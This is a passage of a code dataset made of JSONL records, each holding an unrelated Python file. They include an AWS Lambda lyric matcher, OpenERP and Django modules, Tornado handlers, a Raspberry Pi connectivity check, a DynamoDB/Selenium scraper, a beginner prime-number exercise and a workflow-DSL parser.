X_new\n\nprint('%d features are selected.' % transformed_X)\nprint('best mean accuracy = %d, max depth = %d, forest size = %d' % (opt_score, opt_depth, opt_n_estimator))\nopt_config = {'max_depth': opt_depth, 'n_estimator': opt_n_estimator, 'transformed_X': transformed_X}\n\npickle.dump(opt_config, open(\"../model/decision_tree_feature_selection_model.pickle\", \"wb\"))\npickle.dump(config, open(\"../model/decision_tree_feature_selection_configs.pickle\", \"wb\"))","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"540095744","text":"from fuzzywuzzy import fuzz\r\nimport json\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\n\r\n# Query the database for a matching lyrics record which has the highest token match ratio with the transcript text\r\ndef lambda_handler(event, context):\r\n dynamodb_client = boto3.client('dynamodb', region_name=\"us-east-1\")\r\n dynamodb = boto3.resource('dynamodb')\r\n #Scan the tableto retrieve & loop through the metadata recordset\r\n table = dynamodb.Table('SongDB')\r\n results = table.scan()\r\n totalRec = results['ScannedCount']\r\n searchString = event['voiceSample']\r\n returnURL = ''\r\n lyricsLink = ''\r\n maxRatio = 0\r\n for i in range(0,totalRec):\r\n currentRec = results['Items'][i]\r\n lyricsText = currentRec['Lyrics']\r\n currentRatio = fuzz.token_set_ratio(searchString, lyricsText)\r\n if currentRatio > maxRatio:\r\n maxRatio = currentRatio\r\n lyricsLink = currentRec['Storage_URL']\r\n \r\n #print(currentRec['Author'])\r\n #print(currentRatio)\r\n return {\r\n 'statusCode': 200,\r\n 'SongLink': lyricsLink,\r\n 'MaxRatio': maxRatio\r\n }\r\n","sub_path":"lambdaFunctions/QueryDB.py","file_name":"QueryDB.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235080910","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (c) 2010-2014 Elico Corp. All Rights Reserved.\n# Alex Duan \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nfrom openerp.osv import orm, fields\n\n\nclass landed_costs_shipment_po(orm.TransientModel):\n\n _name = 'landed.costs.shipment.po'\n _columns = {\n 'purchase_ids': fields.many2many(\n 'purchase.order', 'landed_cost_shipment_group_rel',\n 'shipment_id', 'po_id',\n 'Purchase Order',\n domain=[('shipment_id', '=', False)]),\n }\n\n def link_po(self, cr, uid, ids, context=None):\n purchase_obj = self.pool.get('purchase.order')\n for assigner in self.browse(cr, uid, ids, context=context):\n po_ids = [po.id for po in assigner.purchase_ids]\n if context and context.get('active_id', False):\n # link the pos to the current shipment\n for po in purchase_obj.browse(cr, uid, po_ids, context=context):\n po.write({'shipment_id': context.get('active_id')})\n \n return {'type': 'ir.actions.act_window_close'}\n\n def confirm(self, cr, uid, ids, context=None):\n shipment_id = context.get('active_id', False)\n","sub_path":"purchase_landed_costs_extended/wizard/shipment_wizard.py","file_name":"shipment_wizard.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"63897603","text":"import gtf_related\nimport trinity_related\nimport plot\n\n\n\ntriDB = trinity_related.TrinityDatabase(\"dgri\")\npsl_lines = triDB.get_psl_lines_by_trinity_trans(\"TRINITY_DN27877_c0_g1_i1\")\nnum_psl_lines = len(psl_lines)\n\n''' initialize plot '''\nfig, (axes) = plot.initializePlot(figureWidth = 30, figureHeight = 10, nrows= (num_psl_lines * 2), ncols=1)\n#fig.suptitle(gene_symbol) #('bold figure suptitle', fontsize=14, fontweight='bold')\n\nindex = 0\n# TRINITY_DN27877_c0_g1_i1\n# TRINITY_DN29060_c3_g1_i1\n# TRINITY_DN29060_c3_g1_i3\n# TRINITY_DN28702_c2_g1_i2\nfor line in psl_lines:\n print(line)\n tpos = []\n (qchrom, lst_blocks, tchrom, lst_tblocks) = trinity_related.get_blocks_for_psl_line(line)\n print(lst_tblocks)\n for tblock in lst_tblocks:\n tpos.append(tblock[0])\n tpos.append(tblock[1])\n plot.anPlot(axes[index], tblock[0], tblock[1], \"+\", \"exon\", 0)\n index += 1\n \n left_boudary = sorted(tpos)[0]\n right_boudnary = sorted(tpos)[-1]\n overlapped_FBgns = gtf_related.get_features_from_chrom_range(\"dgri\",tchrom,left_boudary,right_boudnary)\n print(overlapped_FBgns)\n \n plot.plot_whole_annotation_for_multiple_genes(axes[index], \"dgri\", overlapped_FBgns)\n axes[index-1].set_xlim(axes[index].get_xlim())\n index += 1\n \nfig.show()\n","sub_path":"CRoS/visualize.trinity.py","file_name":"visualize.trinity.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"488514784","text":"import logging\nimport tornado.web\nimport tornado.gen\nimport traceback\nimport http\nimport os\nimport functools\n\nlogger = logging.getLogger(\"tornado.application\")\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n @tornado.gen.coroutine\n def log_exception(self, exc_type, exc_value, exc_traceback):\n logger.warning(\"Exception %s\" % exc_value)\n if (not isinstance(exc_value, tornado.web.HTTPError)) or (exc_value.status_code >= http.client.INTERNAL_SERVER_ERROR):\n stacktrace = ''.join(traceback.format_tb(exc_traceback))\n logger.error(\"Stacktrace %s\" % stacktrace)\n\n @tornado.gen.coroutine\n def write_error(self, status_code, **kwargs):\n exc_type, exc_value, exc_traceback = kwargs[\"exc_info\"]\n msg = str(exc_value)\n self.write(msg) # return custom error message in the body\n\n def set_default_headers(self):\n pass\n# self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n\n\nclass InfoHandler(BaseHandler):\n SUPPORTED_METHODS = ('GET',)\n\n def get(self):\n \"\"\"Read server parameter\n\n :status 200: ok\n\"\"\"\n data = tornado.options.options.as_dict()\n data['rootpath'] = self.settings['rootpath']\n self.write(data)\n\n\nclass ErrorHandler(BaseHandler):\n \"\"\"Generates an error response with status_code for all requests.\"\"\"\n def initialize(self, status_code):\n self._status_code = status_code\n\n def write_error(self, status_code, **kwargs):\n if status_code == http.client.NOT_FOUND:\n self.write('Oups! Are you lost ?')\n elif status_code == http.client.METHOD_NOT_ALLOWED:\n self.write('Oups! RTFM.')\n\n def prepare(self):\n raise tornado.web.HTTPError(self._status_code)\n","sub_path":"video_explorer/handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"491695648","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tuvedi/admin/layout.py\n# Compiled at: 2011-11-24 10:52:41\nimport sqlalchemy as sa, pypoly, pypoly.session\nfrom pypoly.content.webpage import Webpage\nfrom pypoly.content.webpage import tab, table, message\nfrom pypoly.content.webpage.form import text, Form, button, input\nfrom pypoly.content.webpage import table\nfrom pypoly.content.webpage.form import list as form_list\nfrom pypoly.http import auth\n\nclass LayoutTable(table.Table):\n\n def __init__(self, *args, **kwargs):\n table.Table.__init__(self, *args, **kwargs)\n self.header.append([\n _('Title'),\n _('Template(Class name)'),\n _('Description'),\n table.LabelCell(value=_('Actions'), colspan=2)])\n self.cols.append(table.TextCell())\n self.cols.append(table.TextCell())\n self.cols.append(table.TextCell())\n self.cols.append(table.LinkCell())\n self.cols.append(table.LinkCell())\n\n\nclass CreateLayout(Form):\n\n def __init__(self, *args, **kwargs):\n data = kwargs['_data']\n del kwargs['_data']\n Form.__init__(self, *args, **kwargs)\n self.append(input.TextInput('title', label=_('Title'), required=True))\n self.append(text.Textarea('description', label=_('Description')))\n sel = form_list.DropdownList('template_id', label=_('Template'), required=True)\n for template in data['templates']:\n sel_list = form_list.ListGroup(None, label=template['title'])\n for layout in template['layouts']:\n sel_list.append(form_list.ListItem(None, label=layout['title'], value='%d_%s' % (\n template['id'],\n layout['name'])))\n\n sel.append(sel_list)\n\n self.append(sel)\n self.add_button(button.SubmitButton('submit', label=_('Create')))\n return\n\n\nclass DeleteLayout(Form):\n\n def __init__(self, *args, **kwargs):\n data = kwargs['_data']\n del kwargs['_data']\n Form.__init__(self, *args, **kwargs)\n self.append(input.TextInput('title', label=_('Title'), readonly=True, value=data['title']))\n self.append(text.Textarea('description', label=_('Description'), readonly=True, value=data['description']))\n self.add_button(button.SubmitButton('yes', label=_('Yes, delete it')))\n self.add_button(button.SubmitButton('no', label=_(\"NO, don't delete it\")))\n\n\nclass EditLayout(Form):\n\n def __init__(self, *args, **kwargs):\n data = kwargs['_data']\n del kwargs['_data']\n Form.__init__(self, *args, **kwargs)\n self.append(input.TextInput('title', label=_('Title'), required=True, value=data['title']))\n self.append(text.Textarea('description', label=_('Description'), value=data['description']))\n self.add_button(button.SubmitButton('save', label=_('Save')))\n self.add_button(button.SubmitButton('cancel', label=_('Cancel')))\n\n\nclass Controller(object):\n _pypoly_config = {'session.mode': pypoly.session.MODE_READONLY}\n\n @pypoly.http.expose(auth=auth.any(auth.group('tuvedi.user'), auth.group('tuvedi.admin')))\n def index(self, **values):\n db_conn = pypoly.tool.db_sa.connect()\n db_template = pypoly.tool.db_sa.meta.tables['template']\n db_layout = pypoly.tool.db_sa.meta.tables['layout']\n db_sel = sa.sql.select([\n db_template.c.id,\n db_template.c.title])\n db_res = db_conn.execute(db_sel)\n templates = []\n for row in db_res:\n templates.append(dict(id=row[db_template.c.id], name=row[db_template.c.title]))\n\n data = dict(templates=pypoly.tool.tuvedi.get_templates_with_layouts())\n form = CreateLayout('layout', method='POST', title=_('Create layout'), action=pypoly.url(action='index', scheme='layout'), _data=data)\n form.prepare(values)\n if form.is_submit() and form.validate():\n tmp = form.get_value('template_id').split('_', 1)\n template_id = int(tmp[0])\n layout_name = tmp[1]\n db_ins = db_layout.insert().values(title=form.get_value('title'), description=form.get_value('description'), template_id=template_id, class_name=layout_name)\n db_conn.execute(db_ins)\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'created'}, scheme='layout'))\n page = Webpage()\n if 'status' in values:\n if values['status'] == 'created':\n page.append(message.Success(text=_('Layout successfully created.')))\n if values['status'] == 'delete-canceled':\n page.append(message.Info(text=_('Deletion canceled.')))\n if values['status'] == 'delete-failed':\n page.append(message.Error(text=_('Something went wrong while deleting the Layout.')))\n if values['status'] == 'delete-success':\n page.append(message.Success(text=_('Layout successfully deleted.')))\n if values['status'] == 'edit-canceled':\n page.append(message.Info(text=_('Editing canceled and changes not saved.')))\n if values['status'] == 'edit-failed':\n page.append(message.Error(text=_('Something went wrong while saving the layout.')))\n if values['status'] == 'edit-success':\n page.append(message.Success(text=_('Settings are successfully saved.')))\n layout_tabs = tab.DynamicTabs('tabs-layout', title=_('Manage Layouts'))\n layout_tab = tab.TabItem('tab-list', title=_('Layouts'))\n layout_table = LayoutTable()\n db_sel = sa.sql.select([\n db_layout.c.id,\n db_layout.c.title,\n db_layout.c.description,\n db_layout.c.class_name,\n sa.sql.expression.label('tpl_title', db_template.c.title)], db_layout.c.template_id == db_template.c.id)\n db_res = db_conn.execute(db_sel)\n table_empty = True\n for row in db_res:\n table_empty = False\n layout_title = row[db_layout.c.title]\n if layout_title == None:\n layout_title = ''\n layout_description = row[db_layout.c.description]\n if layout_description == None:\n layout_description = ''\n layout_class_name = row[db_layout.c.class_name]\n if layout_class_name == None:\n layout_class_name = ''\n template_title = row[db_template.c.title]\n if template_title == None:\n template_title = ''\n layout_table.append([\n layout_title,\n '%s (%s)' % (\n template_title,\n layout_class_name),\n layout_description,\n table.LinkCell(value=_('Edit'), url=pypoly.url(action='edit', values={'id': row[db_layout.c.id]}, scheme='layout')),\n table.LinkCell(value=_('Delete'), url=pypoly.url(action='delete', values={'id': row[db_layout.c.id]}, scheme='layout'))])\n\n if table_empty == True:\n layout_table.append([\n table.TextCell(colspan=5, value=_('No layouts found.'))])\n layout_tab.append(layout_table)\n layout_tabs.append(layout_tab)\n form_tab = tab.TabItem('tab-create', title=_('Create'))\n form_tab.append(form)\n layout_tabs.append(form_tab)\n page.append(layout_tabs)\n return page\n\n @pypoly.http.expose(routes=[\n dict(action='delete', path='delete/{id}', requirements={'id': '\\\\d+'}, types={'id': int})], auth=auth.any(auth.group('tuvedi.user'), auth.group('tuvedi.admin')))\n def delete(self, **values):\n layout_id = values['id']\n db_conn = pypoly.tool.db_sa.connect()\n db_layout = pypoly.tool.db_sa.meta.tables['layout']\n db_sel = sa.sql.select([\n db_layout.c.id,\n db_layout.c.title,\n db_layout.c.description], db_layout.c.id == layout_id)\n db_res = db_conn.execute(db_sel)\n db_data = db_res.fetchone()\n data = dict()\n data['title'] = db_data[db_layout.c.title]\n if db_data[db_layout.c.description] == None:\n data['description'] = ''\n else:\n data['description'] = db_data[db_layout.c.description]\n form = DeleteLayout('layout', method='POST', title=_('Delete Layout'), action=pypoly.url(action='delete', values={'id': layout_id}, scheme='layout'), _data=data)\n form.prepare(values)\n if form.is_submit() and form.validate():\n if form.is_clicked('yes'):\n db_delete = sa.sql.expression.delete(db_layout, db_layout.c.id == layout_id)\n db_res = db_conn.execute(db_delete)\n if db_res.rowcount > 0:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'delete-success'}, scheme='layout'))\n else:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'delete-failed'}, scheme='layout'))\n else:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'delete-canceled'}, scheme='layout'))\n page = Webpage()\n page.append(form)\n return page\n\n @pypoly.http.expose(routes=[\n dict(action='edit', path='edit/{id}', requirements={'id': '\\\\d+'}, types={'id': int})], auth=auth.any(auth.group('tuvedi.user'), auth.group('tuvedi.admin')))\n def edit(self, **values):\n layout_id = values['id']\n db_conn = pypoly.tool.db_sa.connect()\n db_layout = pypoly.tool.db_sa.meta.tables['layout']\n db_sel = sa.sql.select([\n db_layout.c.id,\n db_layout.c.title,\n db_layout.c.description], db_layout.c.id == layout_id)\n db_res = db_conn.execute(db_sel)\n db_data = db_res.fetchone()\n data = dict()\n data['title'] = db_data[db_layout.c.title]\n if db_data[db_layout.c.description] == None:\n data['description'] = ''\n else:\n data['description'] = db_data[db_layout.c.description]\n form = EditLayout('layout-edit', method='POST', title=_('Edit Layout'), action=pypoly.url(action='edit', values={'id': layout_id}, scheme='layout'), _data=data)\n form.prepare(values)\n if form.is_submit() and form.validate():\n if form.is_clicked('save'):\n db_update = db_layout.update().where(db_layout.c.id == layout_id).values(title=form.get_value('title'), description=form.get_value('description'))\n db_res = db_conn.execute(db_update)\n if db_res.rowcount > 0:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'edit-success'}, scheme='layout'))\n else:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'edit-failed'}, scheme='layout'))\n else:\n raise pypoly.http.HTTPRedirect(url=pypoly.url(action='index', values={'status': 'edit-canceled'}, scheme='layout'))\n page = Webpage()\n page.append(form)\n return page","sub_path":"pycfiles/tuvedi-0.3-py2.6/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":11216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"85207916","text":"#kelly jaramillo, 8-11-2020 fcc python class learnTogether Week 2 code, step 2\n\n#take 2 inputs from user, a starting & ending value (integer) \nprint(\"Please enter a starting value \")\nstarting_val_str = input()\nstarting_val_int = int(starting_val_str) #lets convert our str to int\n\nprint(\"Please Enter a ending value \")\nending_val_str = input()\nending_val_int = int(ending_val_str) #lets convert our str to int\nprint( \" ------------------------------- \")\n\n#the values cant equal each other, and the starting should be smaller\nif (starting_val_int >=ending_val_int):\n print(\"your starting value is larger or equal to your ending value. Nothing else will happen\")\nelse:\n print(\"the prime numbers from your inputs are...\")\n #we are adding a +1 here so that we will get last number. could have done this with a while or do while loop\n for x in range(starting_val_int,ending_val_int+1):\n #a prime number is any number that is evenly divided by itself and 1 only. so for\n #example, 5 is prime since you get no reminder after you divide. but 6 is not prime\n #since we can divid it evenly with 1, 2, 3, and 6.\n #to do this, we will skip over checking if x is in [1,2,3,5,7], since we know all these are \n #prime. after 7, we will mod by these 5 numbers. \n \n isPrime = True\n if (x not in [1,2,3,5,7]):\n isPrime = (x % 2)!=0 and (x % 3)!=0 and (x % 5)!=0 and (x % 7)!=0\n \n if (isPrime):\n print(str(x)+\" is a prime number\")\n \n","sub_path":"w2/prime_io.py","file_name":"prime_io.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386572599","text":"#!/bin/python3\nimport RPi.GPIO as GPIO\nimport subprocess\n\nGPIO.setwarnings (False)\nGPIO.setmode (GPIO.BCM)\nGPIO.setup (16, GPIO.OUT)\nGPIO.setup (12, GPIO.OUT)\n\n\n\nexit_code=subprocess.call('ping -c 4 www.google.com'.split())\nif exit_code is 0:\n GPIO.output(16, True)\n GPIO.output(12, False)\nelse:\n GPIO.output(16, False)\n GPIO.output(12, True)\n","sub_path":"check_Internet.py","file_name":"check_Internet.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426988274","text":"import pandas\ndef firstName( s ):\n# if ((s.find(\"Col.\")>-1) or(s.find(\"Mr.\")>-1) or (s.find(\"Miss.\")>-1)):\n if ((s.find(\"Mrs.\")==-1) or (s.find(\"Lady.\")==-1)):\n b = s.find(\".\")+2\n e = s.find(\" \", b)+1\n else:\n b = s.find(\"(\")+1\n e = s.find(\" \", b)+1\n return s[b:e]\ndef sex(s):\n if (s.find(\"Mr.\")>-1):\n return \"male\"\n else:\n return \"female\"\ndata = pandas.read_csv('titanic.csv', index_col='PassengerId')\nprint( \"Sex\\n\", data['Sex'].value_counts() )\nprint( \"Survived\\n\", data['Survived'].value_counts(1) )\nprint( \"Pclass\\n\", data['Pclass'].value_counts(1) )\nprint( \"Age\\n\", data['Age'].mean() )\nprint( \"Age\\n\", data['Age'].median() )\nprint( \"Age\\n\", data.corr() )\ndata[\"FirstName\"] = data['Name'].apply(firstName)\nprint( \"FirstNameMale\\n\", data['FirstName'][data['Sex'] == \"male\"].value_counts() )\nprint( \"FirstNameFemale\\n\", data['FirstName'][data['Sex'] == \"female\"].value_counts() )\n","sub_path":"Coursera/w1l1/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"484399980","text":"import boto3\n\n\ndynamodb = boto3.resource(\"dynamodb\", region_name='ap-northeast-1')\nlist(dynamodb.tables.all())\n\n#table = dynamodb.Table('Daily_Scraping')\ntable = dynamodb.create_table(\nTableName = 'Daily_scraping',\n KeySchema = [\n {\n 'AttributeName' : 'ID',\n 'KeyType' : 'HASH'\n },\n {\n 'AttributeName' : 'location',\n 'KeyType' : 'RANGE'\n }\n ],\n AttributeDefinitions =[\n {\n 'AttributeName' : 'id',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'location',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'cateory',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'url',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'rank',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'date',\n 'AttributeType' : 'S'\n },\n {\n 'AttributeName' : 'restaurant_name',\n 'AttributeType' : 'S'\n },\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits':1,\n 'WriteCapacityUnits':1\n }\n)\n\n\n'''\nfrom logging import exception\nfrom selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom time import sleep\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.options import Options\nimport pandas as pd\nfrom selenium.webdriver.common.keys import Keys\nimport csv\n\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\n\ndf = pd.read_csv('tokyo.csv', encoding=\"shift_jis\")\nlocation_list = df['town']\n\nbrowser = webdriver.Chrome(executable_path='/home/gm116/bin/chromedriver',options=chrome_options)\nurl = 'https://www.ubereats.com/jp/feed?mod=deliveryDetails&pl=JTdCJTIyYWRkcmVzcyUyMiUzQSUyMiVFNiVCOCU4QiVFOCVCMCVCNyVFNSU4QyVCQSUyMiUyQyUyMnJlZmVyZW5jZSUyMiUzQSUyMkNoSUowUWd4NjdLTUdHQVJkMlpiT2JMWkhQRSUyMiUyQyUyMnJlZmVyZW5jZVR5cGUlMjIlM0ElMjJnb29nbGVfcGxhY2VzJTIyJTJDJTIybGF0aXR1ZGUlMjIlM0EzNS42NjE5NzA3JTJDJTIybG9uZ2l0dWRlJTIyJTNBMTM5LjcwMzc5NSU3RA%3D%3D&ps=1'\n\nfor Location in location_list:\n \n try:\n browser.get(url)\n change_element = browser.find_element_by_xpath('//*[@id=\"wrapper\"]/div[4]/div/div/div[2]/div[3]/div/div[2]/div[1]/div[2]/a')\n change_element.click() #配送先クリック//*[@id=\"wrapper\"]/div[5]/div/div/div[2]/div[3]/div/div[2]/div[1]/div[2]/a\n except NoSuchElementException:\n change_element_1 = browser.find_element_by_xpath('//*[@id=\"wrapper\"]/div[5]/div/div/div[2]/div[3]/div/div[2]/div[1]/div[2]/a')\n change_element_1.click() \n \n sleep(1)\n location_element = browser.find_element_by_xpath('//*[@id=\"location-typeahead-location-manager-input\"]')\n location_element.send_keys(Location) #//*[@id=\"location-typeahead-location-manager-input\"]\n sleep(1)\n location_element.send_keys(Keys.ENTER)\n sleep(1)\n table.put_item(\n Item= {\n 'location' : Location,\n 'url':browser.current_url\n }\n )\n'''\n\n\n\n\n\n","sub_path":"dynamodb.py","file_name":"dynamodb.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191583433","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/jennyq/.pyenv/versions/venv_t12/lib/python3.7/site-packages/tendenci/apps/memberships/migrations/0003_auto_20160217_1217.py\n# Compiled at: 2020-03-30 17:48:04\n# Size of source mod 2**32: 409 bytes\nfrom django.db import migrations, models\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('memberships', '0002_auto_20150804_1545')]\n operations = [\n migrations.AlterField(model_name='membershiptype',\n name='admin_only',\n field=models.BooleanField(default=False, verbose_name='Admin Only'))]","sub_path":"pycfiles/tendenci-12.0.5-py3-none-any/0003_auto_20160217_1217.cpython-37.py","file_name":"0003_auto_20160217_1217.cpython-37.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"140764845","text":"def bisection():\n\tprint(\"Please pick a number between 1 and 100!\")\n\tans = int(raw_input())\n\tassert 0>')\n if contents in words:\n print('Freedom')\n else:\n print('Human Rights')\n\nif __name__ == '__main__':\n inputGame()","sub_path":"elevn.py","file_name":"elevn.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"114649356","text":"from sys import stdin, stdout, stderr, argv, exit\nimport os\nimport json\nimport sys\n\nimport code\n\nfrom pyparsing import *\n\nfrom .grammar import PythonGrammar\nfrom .context import Context\nfrom .interpreter import Interpreter\nfrom .pygen import CodeGenerator\n \nclass PhenoWLParser(object):\n '''\n The parser for PhenoWL DSL.\n '''\n\n def __init__(self, grammar = None):\n self.grammar = grammar if grammar else PhenoWLGrammar()\n self.tokens = ParseResults()\n self.err = []\n \n def error(self, *args):\n self.err.append(\"{0}\".format(', '.join(map(str, args))))\n\n def parse(self, text):\n try:\n self.tokens = self.grammar.program.ignore(pythonStyleComment).parseString(text, parseAll=True)\n return self.tokens\n except ParseException as err:\n print(err)\n self.error(err)\n except Exception as err:\n print(err)\n self.error(err)\n \n def parse_subgrammar(self, subgrammer, text):\n try:\n self.tokens = subgrammer.ignore(pythonStyleComment).parseString(text, parseAll=True)\n return self.tokens\n except ParseException as err:\n print(err)\n self.error(err)\n except Exception as err:\n print(err)\n self.error(err)\n\n def parse_file(self, filename):\n try:\n self.tokens = self.grammar.program.ignore(pythonStyleComment).parseFile(filename, parseAll=True)\n return self.tokens\n except ParseException as err:\n print(err)\n exit(3)\n except Exception as err:\n print(err)\n self.error(err)\n \nif __name__ == \"__main__\":\n from ..timer import Timer\n with Timer() as t:\n p = PhenoWLParser(PythonGrammar())\n if len(sys.argv) > 1:\n tokens = p.parse_file(sys.argv[1])\n else:\n test_program_example = \"\"\"\n#shippi.RegisterImage('127.0.0.1', 'phenodoop', 'sr-hadoop', '/home/phenodoop/phenowl/storage/images', '/home/phenodoop/phenowl/storage/output')\n# GetFolders('/')\n# CreateFolder('/images/img') \n# x = 10\n# y = 10\n# z = 30\n# for k in range(1,10):\n# p =30\n# q = 40\n# if x <= 20:\n# r = 40\n# s = 50\n# if y >= 10:\n# t = 60\n# s = 70\n# print(z)\n# if p < q:\n# print(p + 5)\n\n# task sparktest(s, u, p):\n# GetTools()\n# sparktest('server', 'user', 'password')\n\n# parallel:\n# x = 10\n# q = x\n# print(q)\n# with:\n# y = 20\n# p = y\n# print(p)\n \n# task ('http://sr-p2irc-big8.usask.ca:8080', '7483fa940d53add053903042c39f853a'):\n# ws = GetHistoryIDs()\n# print(len(ws))\n# l = len(ws)\n# if l > 0:\n# print(ws[0])\n# w = GetHistory(ws[0])\n# r = Upload(w['id'], '/home/phenodoop/phenowl/storage/texts/test.txt')\n# print(r)\n #print(w)\n #print(len(w))\n #print(w)\n #print(w['name'])\n\n#result = SearchEntrez(\"Myb AND txid3702[ORGN] AND 0:6000[SLEN]\", \"nucleotide\")\n#print(result)\n\n# s = 10\n# t = \"15\" + \"16\"\n# print(t)\n\n# task ('http://sr-p2irc-big8.usask.ca:8080', '7483fa940d53add053903042c39f853a'):\n# history_id = CreateHistory('Galaxy Pipeline')\n# dataset_id = FtpToHistory('ftp://ftp.sra.ebi.ac.uk/vol1/fastq/SRR034/SRR034608/SRR034608.fastq.gz', history_id)\n# tool_id = ToolNameToID('FASTQ Groomer')\n# ref_dataset_id = HttpToHistory('http://rice.plantbiology.msu.edu/pub/data/Eukaryotic_Projects/o_sativa/annotation_dbs/pseudomolecules/version_6.1/all.dir/all.cDNA.gz', history_id)\n# params = \"name:\" + ref_dataset_id\n# r = RunTool(history_id, tool_id, params)\n# \n# output = r['name']\n# print(output)\n\n\n\n#x[0] = 5*4\n#z = x[0] \n#y = 50 + z\n# a = {3: {'t':'ss'}, 4:11}\n# y = a[3]\n# x = []\n# x[0] = 20\n# y = 5 + (x[0])\n# print(y)\n\n# f = FastQC('fastq\\SRR034608.fastq.gz')\n# print(f)\n\n# parallel:\n# print(10)\n# with:\n# print(11)\n\nref_dataset_name = 100\n#params = [ref_dataset_name, 50]\n# { 'name': ref_dataset_name }\n#params = [{ 'name': ref_dataset_name }, { 'name': [20 * 30] }] \n#params = { 'name': ref_dataset_name }\n\n params = {\"fastq_R1\": {\"values\":[{\"src\":\"hda\", \"id\":\"9ac6c47a8515c831\"}]}, \"fastq_R2\":{\"values\":[{\"src\":\"hda\",\"id\":\"6dbc21d257b88b00\"}]}}\n \nprint(params = 'xt')\n\n \"\"\"\n tokens = p.parse(test_program_example)\n #tokens = p.grammar.assignstmt.ignore(pythonStyleComment).parseString(test_program_example)\n \n tokens.pprint()\n #print(tokens.asXML())\n integrator = PhenoWLInterpreter()\n # integrator = PhenoWLCodeGenerator()\n \n integrator.context.load_library(\"libraries\")\n integrator.run(tokens)\n print(integrator.context.library)\n print(integrator.context.out)\n print(integrator.context.err)\n #print(integrator.code)\n","sub_path":"app/biowl/dsl/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"394476952","text":"from faker import Faker\nfake = Faker()\nimport random\nbuildingtype = ['mansion', 'apartment', 'castle', 'house', 'flat', 'stable']\nimport csv\n\nrecords = []\n\nfor i in range(7):\n record = {'name': f'{fake.color_name()} Mansion', 'address': f'{fake.street_address()}', 'city': f'{fake.city()}', 'zip code': f'{fake.postcode()}', 'building type': f'{random.choice(buildingtype)}', 'lease price': f'{fake.random_int(min=100, max=999, step=1)} $'}\n records.append(record)\n\nfor r in records:\n print(r.get(\"name\"))\n\nwith open(\"todo.pickle\", 'wb') as f:\n pickle.dump(records, f)\n\nwith open(\"todo.pickle\", \"rb\") as f:\n rec = pickle.load(f)\nprint(rec)\n\nfalsedate = fake.date(pattern='%Y-%m-%d', end_datetime=None)\nprint(falsedate)\n\nprint(records[5])\nwith open(f'properties1.csv', 'w', newline='') as csvfile:\n fieldnames = ['name', 'address', 'city', 'zip code', 'building type', 'lease 